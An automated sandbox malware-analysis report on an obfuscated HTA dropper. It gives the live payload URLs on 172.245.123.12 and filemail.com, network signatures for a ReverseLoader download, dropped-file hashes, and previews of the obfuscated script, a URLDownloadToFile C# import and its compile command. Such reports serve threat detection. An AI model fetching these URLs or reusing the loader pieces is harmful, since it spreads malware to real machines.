                  http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFC: | 0% | Avira URL Cloud | safe |
                  https://1016.filemail.com | 0% | Avira URL Cloud | safe |
                  http://crl.microsoftb | 0% | Avira URL Cloud | safe |
                  http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIF | 0% | Avira URL Cloud | safe |
                  https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T | 0% | Avira URL Cloud | safe |
                  http://172.245.123.12/361/seemeb | 0% | Avira URL Cloud | safe |
                  http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFFT_AdaptivePrinterPort.forma | 0% | Avira URL Cloud | safe |
                  https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c | 100% | Avira URL Cloud | malware |
                  http://172.245.123.12/361/TELNERA.txt | 0% | Avira URL Cloud | safe |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  ip.1016.filemail.com | 142.215.209.77 | true | true | | unknown
                  1016.filemail.com | unknown | unknown | false | | high
                  Name | Malicious | Antivirus Detection | Reputation
                  http://172.245.123.12/361/TELNERA.txt | true | Avira URL Cloud: safe | unknown
                  http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIF | true | Avira URL Cloud: safe | unknown
                  https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c | true | Avira URL Cloud: malware | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1815568460.0000000005B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  http://pesterbdd.com/images/Pester.png | powershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://go.StorageJob.cdxml27 | powershell.exe, 00000003.00000002.1812401473.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://contoso.com/License | powershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFC: | powershell.exe, 00000003.00000002.1816747098.0000000007039000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://contoso.com/Icon | powershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://1016.filemail.com | powershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://go.S | powershell.exe, 00000003.00000002.1812401473.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  http://www.microsoft.co? | powershell.exe, 00000003.00000002.1818468127.000000000808F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://github.com/Pester/Pester | powershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T | powershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  http://172.245.123.12/361/seemeb | powershell.exe, 00000003.00000002.1813925745.0000000004F01000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://aka.ms/pscore6lBdq | powershell.exe, 00000003.00000002.1813925745.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034374878.0000000004E91000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://contoso.com/ | powershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1815568460.0000000005B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                              http://crl.microsoftbpowershell.exe, 00000003.00000002.1818468127.00000000080F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1813925745.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034374878.0000000004E91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFFT_AdaptivePrinterPort.formapowershell.exe, 00000003.00000002.1816922583.00000000070FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.215.209.77 | ip.1016.filemail.com | Canada | 32156 | HUMBER-COLLEGECA | true
172.245.123.12 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1566470
                                                Start date and time:2024-12-02 09:17:06 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 45s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:13
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:seemebestgoodluckthings.hta
                                                Detection:MAL
                                                Classification:mal100.phis.troj.expl.evad.winHTA@17/16@1/2
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 39
                                                • Number of non-executed functions: 267
                                                Cookbook Comments:
                                                • Found application associated with file extension: .hta
                                                • Stop behavior analysis, all processes terminated
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 6592 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: seemebestgoodluckthings.hta
Time | Type | Description
03:18:01 | API Interceptor | 107x Sleep call for process: powershell.exe modified
03:18:35 | API Interceptor | 3x Sleep call for process: aspnet_compiler.exe modified
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (3250), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):153980
                                                          Entropy (8bit):3.8161579842669506
                                                          Encrypted:false
                                                          SSDEEP:3072:MlZ1afy+UshLTPok1alZ1afy+UshLTPokLlZ1afy+UshLTPoks:C+fKsJPBU+fKsJPt+fKsJPI
                                                          MD5:2A35C64DA74E31C6BB2233098EBCAD33
                                                          SHA1:AB084CC1659686A49EB65334623F4845E8FDB9F6
                                                          SHA-256:3C1E1203375F84E0DC74AADD09507C7A0F3ECD5626E6F7D5A917F18246C8F2B9
                                                          SHA-512:399989AD6245A605DD5D435D33A8BFCDCF55B6EB2C159D2944A1168026E555F9A924DC04D2D2E0E6844EF40D212B2A89EA2D30350054B3F4C60A43695B610E35
                                                          Malicious:false
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5829
                                                          Entropy (8bit):4.901113710259376
                                                          Encrypted:false
                                                          SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                          MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                          SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                          SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                          SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                          Malicious:false
                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1144
                                                          Entropy (8bit):5.3306128110270805
                                                          Encrypted:false
                                                          SSDEEP:24:3s0SgSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKM9r8Hd:OgSU4xymI4RfoUeW+mZ9tK8NF9u
                                                          MD5:5094DDD5552937A3CE7396DCAA8ECFED
                                                          SHA1:9580113AAE8AD5E1B35F530AF7B5999C3470F962
                                                          SHA-256:33585D3774BAF49B073F90BD4AEC62ABE9507338E085638505D0D7E8D71524BB
                                                          SHA-512:0C8E0B2F065BC539ADCBC581B5C4C8CF80A914786D76E40005C64B1B4CA7B3B712D79D63D565FE9AED2C6AFC56CEA3AEA0A6CB412C6DE35F2EAAC434B722A842
                                                          Malicious:false
                                                          Preview:@...e.................................^..............@..........@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 2 09:53:56 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1328
                                                          Entropy (8bit):3.96838501183391
                                                          Encrypted:false
                                                          SSDEEP:24:Hje9E2+fyNtbXDfHlfwKEbsmfII+ycuZhNMakSoPNnqSqd:V4tbzFoKPmg1ulMa3QqSK
                                                          MD5:0F02B35D3E34486123EB3949857A6FC1
                                                          SHA1:308276719B9C707403780D5391959E7C48671961
                                                          SHA-256:F29CDC67579EBA8D9A51A932535035F2A66BBC9B3F838BA3583F7A527E386CDA
                                                          SHA-512:1C256133B12539BD1E0CB6AFB10E9FCE142723EDD8095E07963BE354CDD75DCEA46C75D57A81628F54E396B5674C8E4AA7EBCCDD53648804EB78D681A36EC52B
                                                          Malicious:false
                                                          Preview:L.....Mg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\pdppuoci\CSCAD4A7145578C4D2F8E5E86198ABD60D6.TMP................:g.k..OS....w............4.......C:\Users\user\AppData\Local\Temp\RES6914.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.d.p.p.u.o.c.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0838268301726703
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry6ak7YnqqoPN5Dlq5J:+RI+ycuZhNMakSoPNnqX
                                                          MD5:A53A67BD6B0ED34F53FD9AC90577A42E
                                                          SHA1:80D9A4731E960A9F7AA8CD26B2CA4C93265748DD
                                                          SHA-256:379A50BBD786C828C638A680E14A1C630201C2081C7985234696B3BF3AD70DC0
                                                          SHA-512:E81BA877E2CD8D5E8F6881232BB53E3356B68AD8A00A34496AD76F6E2091F29129224376952C9AF4E81823CCCF319ACE249819419BFBC71E3CA3D513BC696FF1
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.d.p.p.u.o.c.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.d.p.p.u.o.c.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (355)
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):3.8071536434612825
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuueUe7mMGlfp7QXReKJ8SRHy4Hsf8Xr0J4ubqQmprMIy:V/DTLDfuRmWXfHIu864Iy
                                                          MD5:2506B88F783423EB6A12FAD18A28E4C6
                                                          SHA1:E4B2A9418A3B7D3D3D6F3608F3B094C6CF96A558
                                                          SHA-256:A61DD03E8FD6D96D0F1F793314D5EA799BFA053BA3256C72AC56E75BF8B7228C
                                                          SHA-512:F396FA6AF0740322DCCE95744DD896DC76A62C44F3EDAB04F9D5CDB1F4DBDBB22AAE91EC946ABB73549E37BB166A67318A5ED6F24307B2E77919EBFD6C0A185B
                                                          Malicious:false
                                                          Preview:.using System;.using System.Runtime.InteropServices;..namespace HmPMc.{. public class aAiMzh. {. [DllImport("urLmon.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr JQz,string zc,string TWiJmfizG,uint pMjuteK,IntPtr hGIdwfx);.. }..}.
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.174100570557131
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fTBqzxs7+AEszIwkn23fTBPn:p37Lvkmb6KRf8WZEifZn
                                                          MD5:621420E7F3EADAA038962CC1617DD5AA
                                                          SHA1:710B6EC39F632E00369D4BB29D6A163FF70245F6
                                                          SHA-256:36594EC9BD407A478419C4DC503D6C33B3262544A017346CDB0E379E1BD61658
                                                          SHA-512:CD7F39189A5343559312E66B29729BAB194CDF4569F0F5A057F379CDA0DCB4B7C08917DA5A17004CBF6E2D5E8602193D427CC1219EBF0DBDF3FADB4B1460C4A6
                                                          Malicious:true
                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.0.cs"
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3072
                                                          Entropy (8bit):2.808753205869415
                                                          Encrypted:false
                                                          SSDEEP:24:etGSKWPBG5eM7p8cM0OkvVG7GX+otkZfmWoCqhkWI+ycuZhNMakSoPNnq:6K9sM+V0rVfYJmWVEH1ulMa3Qq
                                                          MD5:8BA5635A7FF7FB5F70046F7BAC7FCC9E
                                                          SHA1:02B77955E3AEFD6A3BB772E2DE40ADFCADF02F89
                                                          SHA-256:2B7C70C92EC041816418A63EB307475A83B9042748EFD5BDEA190161CBA5E079
                                                          SHA-512:F785CE2612857411BE5966C21DFCEB2198034EA366F7A34AF713887C2E6CF7C7BCB1C4ACC042B0BF93694145C77EC4C6F9D1484EEA9F9EC87E9FEA95D1147BE8
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Mg...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................4.-.....t.....t.......................................... ;.....P ......M.........S.....W.....Z.....d.....l...M.....M...!.M.....M.......!.....*.......;.......................................$..........<Module>.pd
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):867
                                                          Entropy (8bit):5.281123867927371
                                                          Encrypted:false
                                                          SSDEEP:24:KJBqd3ka6KRftEifcKax5DqBVKVrdFAMBJTH:Cika6CtEucK2DcVKdBJj
                                                          MD5:D4C0BD695A5EBC066DC99060DB70CAD3
                                                          SHA1:8D30794327EF4422FF7EF9095912703C32CDAC75
                                                          SHA-256:665FB7292B7F9218D582DAF954E848A4191A59D39497501CCC841134F4539A8E
                                                          SHA-512:FB10AC14305FE5F38E3068D6265C001A0AACA97B191478363EEC85E509C650780B0E0084DA6CA0FD7BD2DDC1FDB655EAA50C179DB2FE0EEF8D21FD0A93474C83
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (3250), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):153980
                                                          Entropy (8bit):3.8161579842669506
                                                          Encrypted:false
                                                          SSDEEP:3072:MlZ1afy+UshLTPok1alZ1afy+UshLTPokLlZ1afy+UshLTPoks:C+fKsJPBU+fKsJPt+fKsJPI
                                                          MD5:2A35C64DA74E31C6BB2233098EBCAD33
                                                          SHA1:AB084CC1659686A49EB65334623F4845E8FDB9F6
                                                          SHA-256:3C1E1203375F84E0DC74AADD09507C7A0F3ECD5626E6F7D5A917F18246C8F2B9
                                                          SHA-512:399989AD6245A605DD5D435D33A8BFCDCF55B6EB2C159D2944A1168026E555F9A924DC04D2D2E0E6844EF40D212B2A89EA2D30350054B3F4C60A43695B610E35
                                                          Malicious:true
                                                          Preview:...... . . . .....d.W.I.L.W.L.o.W.R.u.A.L.C.x.B. .=. .".z.l.m.k.f.b.W.m.g.u.p.W.h.N.G.".....r.o.T.i.k.l.Z.d.L.W.B.t.G.K.Q. .=. .".a.L.l.e.a.K.k.K.H.c.L.Z.c.c.L.".....f.P.p.x.j.a.N.q.R.H.K.O.t.C.c. .=. .".C.m.g.W.f.P.k.W.R.t.x.g.q.i.s.".........o.c.i.L.N.U.G.z.e.g.K.h.J.P.L. .=. .".G.k.H.h.l.B.K.r.I.c.a.i.b.W.f.".....u.W.i.W.S.L.f.n.l.k.a.i.Z.N.O. .=. .".o.b.I.b.K.J.L.o.L.o.i.N.W.o.i.".....L.B.o.W.f.K.m.W.P.h.c.T.i.c.f. .=. .".G.h.L.K.U.i.u.L.b.n.d.v.a.k.U.".....d.A.i.A.R.R.N.L.Q.L.k.A.m.q.W. .=. .".v.z.b.e.p.U.I.v.c.A.C.b.W.L.t.".....N.a.c.l.R.N.f.u.H.G.x.d.k.U.T. .=. .".j.q.W.G.A.G.L.r.z.l.c.a.j.P.b.".....R.b.d.j.K.c.p.L.z.u.f.q.I.a.U. .=. .".h.P.U.O.e.P.L.h.o.P.h.U.h.n.K.".....T.e.K.a.N.W.S.e.a.d.f.L.q.N.i. .=. .".n.e.v.B.d.m.x.W.O.h.P.L.U.B.B.".....x.m.W.P.A.u.P.f.z.a.a.j.s.U.i. .=. .".p.A.Z.W.h.o.C.L.L.C.L.b.e.I.W.".....K.v.U.C.l.f.e.H.Z.O.s.W.i.n.L. .=. .".z.U.B.o.S.L.G.i.G.k.l.W.i.k.K.".....f.x.l.z.x.L.k.W.G.R.G.W.p.k.C. .=. .".K.c.K.l.u.n.W.W.L.I.G.l.q.Q.B.".....l.x.I.H.o.Z.m.a.
                                                          File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                          Entropy (8bit):2.4836204478867345
                                                          TrID:
                                                            File name:seemebestgoodluckthings.hta
                                                            File size:159'541 bytes
                                                            MD5:46792b4c6325dfcc5943fb8912b50bcd
                                                            SHA1:b20380592ee042e7d232d4946e63cb5559cb0eda
                                                            SHA256:18a4b2fda9e31862ce0af8003ed1d5ab843d99f25e9e4fd5fb9f328c5cf0d5e6
                                                            SHA512:005bb4cbcc9c2deb6b0e13e2273f78860da429b76510853e7cba59eaf3afa8f553d32d719fea167edad00bf4694f06a1bc50697719d9952ffa0557292f673199
                                                            SSDEEP:96:4owZw9d6yfazVouAC/sI5UE+aoOun2sGo1mgFVouAC/sI5UE+ao4zun2sGo1mgvT:4LwVgWZGALwYCSQ
                                                            TLSH:02F3FF41A9244065FBFD5E96ACEDB74F35A4221E9EC99D8D4327FB80DCB724BA4408CC
                                                            File Content Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%252
                                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                            2024-12-02T09:18:06.576394+0100 | 2858795 | ETPRO MALWARE ReverseLoader Payload Request (GET) M2 | 1 | 192.168.2.4 | 49732 | 172.245.123.12 | 80 | TCP
                                                            2024-12-02T09:18:17.834280+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 142.215.209.77 | 443 | 192.168.2.4 | 49733 | TCP
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Dec 2, 2024 09:18:07.153134108 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.153228045 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.153253078 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.153275013 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.158937931 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.159007072 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.180107117 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.180187941 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.180249929 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.180293083 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.182995081 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.183052063 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.183105946 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.183139086 CET4973280192.168.2.4172.245.123.12
